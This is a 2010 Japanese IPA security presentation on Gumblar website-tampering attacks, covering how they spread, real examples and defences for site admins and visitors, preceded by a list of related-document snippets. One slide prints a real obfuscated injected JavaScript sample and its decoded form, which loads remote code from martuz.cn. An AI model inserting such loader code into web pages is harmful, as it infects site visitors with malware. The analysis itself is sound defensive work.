終息しない ガンブラー攻撃 その対策は? 2010 年 10 月 28 日独立行政法人情報処理推進機構 セキュリティセンターウイルス 不正アクセス対策グループ主幹加賀谷伸一郎 Copyright 2010 独立行政法人情報処理推進機構

Similar documents
第 号 2013 年 6 月 4 日独立行政法人情報処理推進機構 今月の呼びかけ ウェブサイトが改ざんされないように対策を! ~ サーバーやパソコンのみならず システム全体での対策が必要です ~ IPA セキュリティセンターではコンピュータウイルスや不正アクセスに関する届出を受け

ウイルス 不正アクセスの被害状況と対策の動向 ~IPA への届出を踏まえて ~ 2014 年 5 月独立行政法人情報処理推進機構技術本部セキュリティセンター 岡野裕樹 Copyright 2013 独立行政法人情報処理推進機構

図 2: パスワードリスト攻撃の概要 インターネットサービスの安全な利用は 利用者が適切にパスワードを管理することを前提に成り立っており 利用者はパスワードを使い回さず 適切に管理する責任があります 以下はパスワードリスト攻撃を受けたことを 2013 年 4 月以降に発表した企業のうち 試行件数 と

はじめに ウイルスに感染させるための罠が仕掛けられた悪意のある文書ファイルは これまでにも Office の脆弱性の悪用や マクロ機能を悪用する手口のものがありました 昨今 それらとは異なる新たな攻撃手口を使ったものが出てきています 本資料は 新たな攻撃手口について紹介し 注意点を説明するものです

情報セキュリティ 10 大脅威 大脅威とは? 2006 年より IPA が毎年発行している資料 10 大脅威選考会 の投票により 情報システムを取巻く脅威を順位付けして解説 Copyright 2017 独立行政法人情報処理推進機構 2

2. コンピュータ不正アクセス届出状況 別紙 2 (1) 四半期総括 2013 年第 1 四半期 (2013 年 1 月 ~3 月 ) のコンピュータ不正アクセス届出の総数は 27 件でした (2012 年 10 月 ~12 月 :36 件 ) そのうち 侵入 の届出が 18 件 ( 同 :14 件

<4D F736F F F696E74202D2091E63389F15F8FEE95F1835A834C A CC B5A8F FD E835A835890A78CE C CC835A834C A A2E >

はじめに (1) フィッシング詐欺 ( フィッシング攻撃 ) とは フィッシング詐欺とは インターネットバンキング ショッピングサイト等の利用者のアカウント情報 (ID パスワード等 ) や クレジットカードの情報等を騙し取る攻撃です 典型的な手口としては 攻撃者が本物のウェブサイトと似た偽のウェブ

不正送金 フィッシング対策ソフト PhishWall( フィッシュウォール ) プレミアム について 中ノ郷信用組合では インターネットバンキングのセキュリティを高めるため 不正送金 フィッシング対策ソフト PhishWall( フィッシュウォール ) プレミアム をご提供しております ( ご利用は

脆弱性を狙った脅威の分析と対策について Vol 年 7 月 21 日独立行政法人情報処理推進機構セキュリティセンター (IPA/ISEC) 独立行政法人情報処理推進機構 ( 略称 IPA 理事長 : 西垣浩司 ) は 2008 年度におけ る脆弱性を狙った脅威の一例を分析し 対策をまと

今月の呼びかけ 添付資料 ファイル名に細工を施されたウイルスに注意! ~ 見た目でパソコン利用者をだます手口 ~ 2011 年 9 月 IPA に RLTrap というウイルスの大量の検出報告 ( 約 5 万件 ) が寄せられました このウイルスには パソコン利用者がファイルの見た目 ( 主に拡張子

内容 ( 演習 1) 脆弱性の原理解説 基礎知識 脆弱性の発見方法 演習 1: 意図しない命令の実行 演習解説 2

第 号 2014 年 4 月 1 日独立行政法人情報処理推進機構 今月の呼びかけ あなたのパソコンは 4 月 9 日以降 大丈夫? ~ 使用中パソコンの判別方法 乗り換えプランを紹介 ~ マイクロソフト社 Windows XP と Office 2003 のサポートが 2014

不正送金対策 フィッシング対策ソフト PhishWall( フィッシュウォール ) プレミアム のご案内 広島県信用組合では インターネットバンキングを安心してご利用いただくため 不正送金 フィッシング対策ソフト PhishWall( フィッシュウォール ) プレミアム を導入しました 無料でご利用

情報セキュリティ 10 大脅威 大脅威とは? 2006 年より IPA が毎年発行している資料 10 大脅威選考会 の投票により 情報システムを取巻く脅威を順位付けして解説 Copyright 2018 独立行政法人情報処理推進機構 2

情報共有の流れと目的 情報共有の基本的な流れ 参加組織 攻撃を検知 IPA へ情報提供 目的 IPA 分析 加工 ( 匿名化など ) 情報共有 結果の共有 1 類似攻撃の早期検知と被害の回避 2 攻撃に対する防御の実施 3 今後想定される攻撃への対策検討 標的型攻撃メールを当面の主対象として運用中

SQLインジェクション・ワームに関する現状と推奨する対策案

個人情報を盗み出す感染したウイルスにより コンピュータ上に保存されている情報 ( データ ) が勝手に送信されたり キーボード入力を盗み見されたりすること等をいいます 最近のネットバンキングの不正送金もこのカテゴリーに含まれます これ以外にも 以下のような被害を受ける可能性があります 盗まれたクレジ

本 日 の 講 演 内 容 ウェブ 改 ざんの 事 例 改 ざんの 原 因 (サーバ 側 ftpクライアント 側 ) 防 ぐための 管 理 (サーバ 側 ftpクライアント 側 ) 気 づくための 管 理 改 ざん 被 害 発 生 時 の 対 処 1

ネットワーク機器の利用における セキュリティ対策 独立行政法人情報処理推進機構技術本部セキュリティセンター大道晶平

第 号 2014 年 1 月 7 日独立行政法人情報処理推進機構 今月の呼びかけ おもいこみ僕は安全それ危険 昨年発生した情報セキュリティに関する様々な事案の中で 金銭被害につながる可能性が高いという 点で 特に一般利用者に影響が高いと考えられるものは以下の 4 つです 1. イ

Microsoft Word - gred_security_report_vol17.final

1. SQL インジェクションの問題と脅威 2

マルウェアレポート 2017年9月度版

Microsoft Word - gred_report_vol25_110830_final.docx

2.5 月のアクセスの状況 28 年 5 月のアクセス状況は 4 月と比べて若干減少しました これは主に Windows Messenger サービスを悪用してポップアップメッセージを送信するアクセスである 126/udp 127/udp および 128/udp などへのアクセスが減少したためです

2. 留意事項セキュリティ対策を行う場合 次のことに留意してください 不正侵入対策の設定を行う場合 お使いのソフトウェアによっては今までのように正常に動作しなくなる可能性があります 正常に動作しない場合は 必要に応じて例外処理の追加を行ってください ここで行うセキュリティ対策は 通信内容の安全性を高

安全な Web サイトの作り方 7 版 と Android アプリの脆弱性対策 独立行政法人情報処理推進機構 (IPA) 技術本部セキュリティセンター Copyright 2015 独立行政法人情報処理推進機構

/ 11

1.indd

製品概要

McAfee Application Control ご紹介

OSI(Open Systems Interconnection)参照モデル

PowerPoint プレゼンテーション

インシデントハンドリング業務報告書

マルウェアレポート 2018年1月度版

サービス内容 サービス内容 アルファメールダイレクトのサービス内容 機能 対応環境についてご案内します 基本サービス 管理者機能 アルファメールダイレクトをご利用になる前に まず管理者の方がメールアドレスの登録や 必要な設定を行います すべての設定は ホームページ上の専用フォームから行います < 主

マイナンバー対策マニュアル(技術的安全管理措置)

Template Word Document

はじめに このスタートアップマニュアルは はじめて弊社サービスをご利用される方のためにご用意していますので ホームページ運営に必要な ごく基本的な使い方だけをご紹介しています 詳しい使い方の説明は オンラインマニュアルをご覧ください ホームページ運営にあたりどんなによい商品やすばらしい技術であっても

マルウェアレポート 2018年2月度版

スライド 1

中小企業向け サイバーセキュリティ対策の極意

CloudEdgeあんしんプラス月次レポート解説書(1_0版) _docx

Microsoft Word - gred_report29_ final.docx

1. 標的型サイバー攻撃への取り組み 2. 標的型攻撃メールの見分け方 3. 添付ファイルの見分け方 4. 標的型攻撃メールを見つけたら Copyright 2015 独立行政法人情報処理推進機構 1

講演内容 情報セキュリティ 情 情報セキュリティを取り巻く情勢 インターネット上の脅威を知ろう 個人にかかる脅威 対策 企業にかかる脅威 対策 2

v6

安全なウェブサイトの作り方 7 版 の内容と資料活用例 2

OSI(Open Systems Interconnection)参照モデル

SHODANを悪用した攻撃に備えて-制御システム編-

システム利用前の準備作業2.1 準備作業の流れ 準備作業の流れは 以下のとおりです 2必要なものを用意する 2.2 パソコンインターネット接続回線 E メールアドレス 2.2-(1) 2.2-(2) 2.2-(3) 当金庫からの送付物 2.2-(4) パソコンの設定をする 2.3 Cookie の設

目次 1. はじめに 2. 内部不正による情報漏えいの危険性 3. 情報漏えい対策ポイント 4. 情報漏えい発生時の対応ポイント 5. 参考資料の紹介 ( 講師用 ) Copyright 2015 独立行政法人情報処理推進機構 2

2 1: ネットワーク設定手順書 が完了後に行なってください 鏡野町有線テレビ 各種設定手順書 この手順書では以下の内容の手順を解説しています メール設定 ホームページの掲載 お客様がご利用の OS により設定方法が異なる部分があります OS をご確認の上 作業を行なってください お客

金融工学ガイダンス

5. オープンソースWAF「ModSecurity」導入事例 ~ IPA はこう考えた ~


Microsoft Word - FTTH各種設定手順書(鏡野地域対応_XP項目削除) docx

目次 メールの基本設定内容 2 メールの設定方法 Windows Vista / Windows 7 (Windows Live Mail) Windows 8 / Windows 10 (Mozilla Thunderbird) 3 5 Windows (Outlook 2016) メ

セキュリティテスト手法 ファジング による脆弱性低減を! ~ 外部からの脅威に対し 製品出荷前に対策強化するために ~ 2016 年 5 月 12 日独立行政法人情報処理推進機構技術本部セキュリティセンター情報セキュリティ技術ラボラトリー鹿野一人 1

本日 お話しすること 第一部多様化する IoT のセキュリティ脅威 IoT 機器に感染するウイルスの多様化 脆弱性を有する IoT 機器の散在 国内に広がる感染被害 第二部開発者 製造者の対策 IoT 開発におけるセキュリティ設計の手引き 開発段階からセキュリティを考慮 ( セキュリティ バイ デザ

3 アカウント画面で新しいアカウント作成 :[ メール ] をクリックします 4 新しいメールアドレスを使いたい方という画面の下部にある [ メールアカウントを設定する ] ボタ ンをクリックします 2

映像で知る情報セキュリティ社内研修用教材 Information-technology Promotion Agency, Japan 主な対象主に組織内の情報セキュリティ教育担当者 P マークや ISMS の事務局担当者 コンプライアンス部門担当者 その他情報セキュリティの最新状況を入門的に理解し

スライド 1

2 実施件数 (2017 年 7 月 ~9 月 ) 2017 年 7 月 ~9 月に J-CSIP 参加組織から IPA に対し サイバー攻撃に関する情報 ( 不審メール 不正 通信 インシデント等 ) の情報提供が行われた件数と それらの情報をもとに IPA から J-CSIP 参加組織へ 情報共

目次 1. コンピュータウイルス届出状況 ウイルス届出件数 不正プログラム検出数 ウイルス検出数 検出ウイルスの種類 ウイルス届出者 ウイルスおよび不正プログラムの検出

プレゼンテーション

1 罠のリンクが含まれるメールによる感染まず 利用者に対して 文中に罠のリンクが含まれるメール ( 罠のメール ) が届きます そのリンク先は 一見 PDF ファイル 2 や動画ファイルに見えるよう細工されています ( 図 1-2) また メールの送信元のメールアドレスは 利用者の知人のものである可

目次 1 サービス概要 3 あんしんフィルター for auとは 4 動作環境 5 2 利用開始 6 アプリをインストールする 7 サービスを開始する 8,9 あんしんフィルター for au アプリアイコンの移動 10 3 設定変更 11 管理者を登録する 12 管理者画面を表示する 13 管理す

.1 準備作業の流れ 準備作業の流れは 以下のとおりです 必要なものを用意する. パソコンインターネット接続回線 E メールアドレス.-(1).-().-(3) 当金庫からの送付物.-(4) パソコンの設定をする.3 Cookie の設定を行う.3-(1) Java の設定を有効にする ( ファイル

共通フィルタの条件を設定する 迷惑メール検知 (SpamAssassin) の設定 迷惑メール検知 (SpamAssassin) とは.

パソコンをご利用中に Windows のシステム警告 ドライバの更新 システムの破損 等の見慣れない 不審なメッセージが表示された場合の対処法についてドキュメント ID: TS 環境 Windows 10 Windows 8.1 Windows 7 概要 このページでは インターネットを

Microsoft Word - gred_security_report_vol27_ docx

WEBシステムのセキュリティ技術

メールソフトの設定 設定に必要な情報について... P2 迷惑メール対策 OP25B について... P3 Outlook 2016 の設定... P5 Outlook 2013 の設定... P8 Windows 10 メールアプリの設定... P11 Mail 10.0 の設定... P15 i

E 年 2 月 26 日 サービス & セキュリティ株式会社 e-gate センター サプライチェーン攻撃の脅威と対策について 1. 概要 サプライチェーン攻撃のリスクはかねてから指摘されていました 経済産業省が 2015 年に公表した サイバーセキュリティ経営ガイドライン

FutureWeb3サーバー移管マニュアル

マルウェアレポート 2017年12月度版

PowerPoint プレゼンテーション

これだけは知ってほしいVoIPセキュリティの基礎

メール設定 Outlook Express 6 の場合 (Windows 98 ~ XP) Outlook Express 6 の場合 (Windows 98 ~ XP) Windows XP に付属する Outlook Express 6 に αweb のメールアカウントを追加する方法についてご案

/

あなたも狙われている! インターネットバンキングを狙った不正送金が急増しています! 警察庁の発表 1 によれば インターネットバンキング利用者の情報を盗み取り 利用者の口座から不正送金する事案の被害が急増しています 平成 24 年にはわずか 64 件 約 4,800 万円だった被害額が 平成 27

技術レポート 1)QuiX 端末認証と HP IceWall SSO の連携 2)QuiX 端末認証と XenApp の連携 3)QuiX 端末認証 RADIUS オプションと APRESIA の連携 Ver 1.1 Copyright (C) 2012 Base Technology, Inc.

Visio-XPSP2_fl—fl….vsd

PowerPoint プレゼンテーション

突然現れるパソコンの警告表示をすぐにクリックしないこと!-その表示は、有料ソフトウエアの広告かもしれません-

96. ウイルスや不正アクセス等の被害状況 図表 96は 昨年 1 年間に自宅のパソコンでコンピュータウイルスや不正アクセスなどの障害や被害にあったかどうかを尋ねた結果を日米韓で比較したものである コンピュータウイルスを発見した人の割合とコンピュータウイルスに感染した人の割合は いずれも韓国が一番高

(3) ボット対策のしおり あなたのパソコンは ボットに感染していませんか 独立行政法人 情報処理推進機構 セキュリティセンター 0

SOC Report

スライド 1

10 完了 をクリック 13 このサーバーは認証が必要 をチェックして 設定 をクリック Windows メール Windows Vista に標準のメールソフト Windows メール の設定方法を説明します 1 スタート から 電子メール Windows メール をクリック 11 続いて設定ファ

FWA インターネットアクセスサービス SUN-AGE メール設定マニュアル XP 編 (OutlookExpress) 1-5 Vista 編 (Windows メール ) 6-17 Windows Webmail 編 23 FTP 設定マニュアル 24-1 版 2007/05 改定

Windows PC VPN ユーザー向け手順書 SoftEther VPN (SSL-VPN) を用いた筑波大学 VPN サービスへの接続方法 学術情報メディアセンター VPN ユーザーマニュアルから Windows PC 向けの情報だけを詳細に説明した設定手順書を作成いたしましたのでご利用くださ

ログを活用したActive Directoryに対する攻撃の検知と対策

Microsoft Word ウイルスリリース改2.doc

2. ウイルス 不正アクセス届出状況の公表個人や企業 教育 研究 公的機関などからいただいた届出を分析し毎月公表しています 特に重要な内容については 今月の呼びかけ として注意を促し 必要に応じて緊急の 注意喚起 も行います 毎月行う届出の公表では コンピュータウイルス届出状況 コンピュータ不正アク

FutureWeb3 サーバー移管マニュアル Vol.004

FTP ウェブコンテンツダウンロード手順書 ver1.0 作成 :KDDI 株式会社 作成日 :2018 年 10 月 31 日

クライアント証明書インストールマニュアル

Transcription:

終息しない ガンブラー攻撃 その対策は? 2010 年 10 月 28 日独立行政法人情報処理推進機構 セキュリティセンターウイルス 不正アクセス対策グループ主幹加賀谷伸一郎 Copyright 2010 独立行政法人情報処理推進機構

本日の講演内容 1. ガンブラー攻撃 についての復習 2. 改ざんの実例 3. 対策方法の整理 Copyright 2010 独立行政法人情報処理推進機構 2

ガンブラー の解説 ガンブラー (Gumblar) とは? ウェブ経由でパソコンにウイルスを感染させようとする攻撃手法の一種 (Drive-by download) ウェブサイト改ざん と ウェブ感染型ウイルス を組み合わせた攻撃 正規のサイト が改ざんされるため サイト閲覧者の警戒度は低い IPA に情報が寄せられた改ざんサイト情報は 100 件以上 (2010 年 6 月以降 ) Copyright 2010 独立行政法人情報処理推進機構 3

正規のウェブサイトを経由した攻撃とは 正規ウェブサイトを改ざんして利用者が攻撃される http://.co.jp/ http://.ne.jp/ http://.or.jp/ Copyright 2010 独立行政法人情報処理推進機構 4

2010 年版 10 大脅威 1 位 変化を続けるウェフ サイト改ざんの手口 Copyright 2010 独立行政法人情報処理推進機構 5

ガンブラー攻撃の場合は <script> 悪意あるウェブサイトへ行け!! 悪意あるサイトにあるスクリプトを読め! </script> 悪意あるウェブサイト gumblar.cn でも裏では 悪意あるコードが挿入されている 見た目はいつも通り 同時にこちらへも 閲覧改ざんされた正規ウェブサイト感染! 一般利用者 Copyright 2010 独立行政法人情報処理推進機構 6

ガンブラー攻撃の全体図 Copyright 2010 独立行政法人情報処理推進機構 7

サイト閲覧者にとっての脅威 セキュリティ対策が不十分なパソコンでは サイトを閲覧するだけでウイルスに感染させられてしまい かつ ウイルスに感染したことが見た目には全く分からない場合がある 有名企業のウェブサイトが攻撃に使われる場合があるため 不審なウェブサイトを閲覧しない といった回避策が有効とならず 日常的に利用しているウェブサイトが突然危険なウェブサイトとなる可能性もある 悪意あるサイトに仕掛けられるウイルスは攻撃者が任意にコントロールできるため 閲覧者はどのようなウイルスに感染させられるか予測できない Copyright 2010 独立行政法人情報処理推進機構 8

サイト閲覧者側の被害事例 現在のところ 次に挙げるウイルスに感染した事例が報告されている ウェブサイト管理用の ID とパスワード (ftp のアカウント情報 ) を盗むウイルス パソコン内のソフトで保存している ID とパスワード情報を盗むウイルス (ftpクライアントやie6) 偽セキュリティ対策ソフト型ウイルス ( ウイルスが発見されたという偽の表示を行い 駆除するために偽セキュリティ対策ソフトの 有償版 の購入を迫るウイルス ) 周囲のマシンにDoS 攻撃を仕掛けるウイルス 今後 どのようなウイルスが仕掛けられるか分からない! Copyright 2010 独立行政法人情報処理推進機構 9

連鎖するガンブラー攻撃の被害 ウェブサイトの改ざん & ウイルスの配置 攻撃者 攻撃に使われるウェブサイト 1 3 ウェブサイト管理用 ID とパスワードの盗難 4 1 ID=satou PASS=abc 2 Copyright 2010 独立行政法人情報処理推進機構 ウェブ利用者かつウェブサイトの管理者 一般利用者と同じ仕組みでウイルス感染 10

1. ガンブラー攻撃 についての復習 2. 改ざんの実例 3. 対策方法の整理 Copyright 2010 独立行政法人情報処理推進機構 11

2009 年 5 月に発見した事例 <script language=javascript><!-- (function(){var eaw='%';var yvwnr=('va-72-20-61-3d-22-53-63-72iptengine-22-2cb-3d-22ve-72-73ion()-2b-22-2cj-3d-22-22-2cu-3dnavi-67ator-2euseragent-3bif-28-28u-2e-69n-64e-78o-66(-22-43- 68ro-6de-22)-3c0)-26-26(-75-2eindexOf(-22Win-22)-3e0)-26-26(u-2eindexOf(-22NT-206-22-29-3c-30)- 26-26-28-64o-63u-6dent-2ec-6fokie-2e-69ndex-4ff-28-22-6d-69ek-3d-31-22)-3c0)-26-26-28-74-79pe-6ff- 28zrv-7a-74-73-29-21-3d-74yp-65-6ff(-22A-22-29))-7bzrvzts-3d-22A-22-3beva-6c(-22if-28w-69-6edow- 2e-22+a+-22-29j-3d-6a+-22+a+-22Major-22+b+a-2b-22Mi-6eor-22+b+a+-22Build-22+b+-22j-3b-22-29- 3bdocu-6d-65nt-2ew-72ite(-22-3c-73cript-20sr-63-3d-2f-2fma-72-22+-22tuz-2e-63-6e-2f-76id-2f-3f-69d- 3d-22-2bj+-22-3e-3c-5c-2fs-63rip-74-3e-22)-3b-7d').replace(/-/g,eaW);eval(unescape(yvwNr))})(); var a= ScriptEngine,b= Version()+,j=,u=navigator.userAgent; g if((u.indexof( Chrome )<0)&&(u.indexOf( Win )>0)&&(u.indexOf( NT 6 ) <0) && (document.cookie.indexof( miek=1 ) <0) && (typeof(zrvzts)!= replace 操作 ( - を % に置換 ) unescape 関数でデコード typeof( A ))){zrvzts="a";eval("if(window."+a+")j=j+"+a+"major"+b+a+"minor"+b+a+"build"+b+"j;"); document.write("<script src=//mar"+"tuz.cn/vid/?id="+j+">< /script>");} j p martuz.cn に飛ばされるようになっていた! Copyright 2010 独立行政法人情報処理推進機構 12

2009 年 12 月に発見した事例 Copyright 2010 独立行政法人情報処理推進機構 13

2010 年 8 月 10 月に発見した事例 HTMLファイルの末尾や冒頭に1 行 難読化されていない 悪意あるサイトの.jsファイルや.phpファイルを読み込むスクリプト Copyright 2010 独立行政法人情報処理推進機構 14

1. ガンブラー攻撃 についての復習 2. 改ざんの実例 3. 対策方法の整理 Copyright 2010 独立行政法人情報処理推進機構 15

改ざんを防ぐためのサイト管理方法 パスワードの強化 複数人での使い回しもしない アクセス制限 ウェブサイトを更新できる場所を組織内 のみに限定するよう ネットワークやサーバの構成を見直す もし インターネット経由でウェブサイトを更新する必要がある場合でも 接続元 IPアドレスを制限したりVPNを導入するなど ftp 以外でサイト更新 ftp 接続は拒否し他の方法で SSH(Secure SHell) の scp(secure Copy) コマンド FTPS(File Transfer Protocol over SSL/TLS) 更新専用パソコンの導入 ウェブサイトを更新するための専用パソコンを導入する このパソコンでは ウイルスによる被害を防止するためにウェブの閲覧やメールの確認をせず ウイルス対策ソフトを最新の状態にし 可能な限り脆弱性を解消しておく 専用ネットからの更新ならなお良し 16 Copyright 2010 独立行政法人情報処理推進機構

改ざんを防ぐためのサイト管理方法 scp FTPS など ftp 以外でサイト更新 VPN など アクセス制限 外部のウェブサイト管理者 Copyright 2010 独立行政法人情報処理推進機構 17

ウェブページ更新用パソコンでの対策 ウェブページのupload 専用とし メール送受信やウェブサイト閲覧はしない ウェブサイトの改ざん & ウイルスの配置 攻撃者 攻撃に使われるウェブサイト ウェブサイト管理用 ID とパスワードの盗難 被害の連鎖を断ち切る! ID=satou PASS=abc Copyright 2010 独立行政法人情報処理推進機構 ウェブ利用者かつウェブサイトの管理者 一般利用者と同じ仕組みでウイルス感染 18

改ざんに気付くためのサイト管理方法 ウェブサイト上にメールアドレス等の連絡先を掲載しておくことで 外部から指摘が クリーンな状態のウェブページファイルを 安全な形 (DVDに焼くなど) で別途保管しておき ウェブサーバ上のファイルと定期的に比較 ウェブサイトの更新等に使用する ftp 等のアクセスログを定期的にチェック 改ざんを早期に発見するためのウェブサイト改ざん検知サービスなどを利用 ( 悪意あるサイトへのリンクがないかチェック可能ならなお良し ) Copyright 2010 独立行政法人情報処理推進機構 19

なるべくお金を掛けない方法はないの? ウイルス対策ソフト入りパソコンで 管理しているウェブページを閲覧し ウイルス警告が出ない状態を維持すべく手動で監視 ウイルス検知精度を上げるには 利用するウイルス対策ソフトの数を増やす ( それに伴いパソコンの台数も増やす必要あり ) ウェブページ監視の頻度を上げる (1 日毎? 何時間毎? 何分毎?) 無料のウェブサイトチェックサービスを利用 VirusTotal http://www.virustotal.com/index.html#url-submission / Copyright 2010 独立行政法人情報処理推進機構 20

VirusTotal でのチェック例 Copyright 2010 独立行政法人情報処理推進機構 21

ウェブブラウザによる警告の例 Copyright 2010 独立行政法人情報処理推進機構 22

検索サイトによる警告の例 それでも見ようとしてクリックすると Copyright 2010 独立行政法人情報処理推進機構 23

検索サイトによる警告の例 ( つづき ) Copyright 2010 独立行政法人情報処理推進機構 24

改ざん被害発生時の対処 早急なウェブサイトの公開停止 加害者 にならないために 改ざん箇所の洗い出し等の調査 ウェブページファイル比較 ftp アクセスログ確認 全ウェブページファイルを DL し ウイルスチェック ウェブサイトを再公開する場合の注意点 サイト閲覧者に向けた事実告知が重要 事実の説明 改ざん箇所 改ざん期間 想定される被害内容 改ざん期間ウイルスチェック方法 連絡先明示など Copyright 2010 独立行政法人情報処理推進機構 25

サイト閲覧者側の対策方法 ウイルス対策ソフトの導入と適切な運用 ウイルス定義ファイルを最新に保つことが必須! 統合型セキュリティ対策ソフトがオススメ ( 有害サイトのブロック機能が有効 ) 脆弱性の解消 OS(Windows など ) その他ソフト全てを最新に! こまめなアップデートが必須! ( ご参考 ) MyJVN バージョンチェッカ (IPA) http://jvndb.jvn.jp/apis/myjvn/#vccheck 2010 年 10 月現在 Windows XP と Vista に対応 Copyright 2010 独立行政法人情報処理推進機構 26

MyJVN バージョンチェッカ実施例 Copyright 2010 独立行政法人情報処理推進機構 27

セキュリティセンター (IPA/ISEC) http://www.ipa.go.jp/security/ 情報セキュリティ安心相談窓口 : TEL 03(5978)7509 (IPA 職員による対応は平日 10:00-12:00 13:30-17:00) FAX 03(5978)7518 E-mail: anshin@ipa.go.jp Copyright 2010 独立行政法人情報処理推進機構 28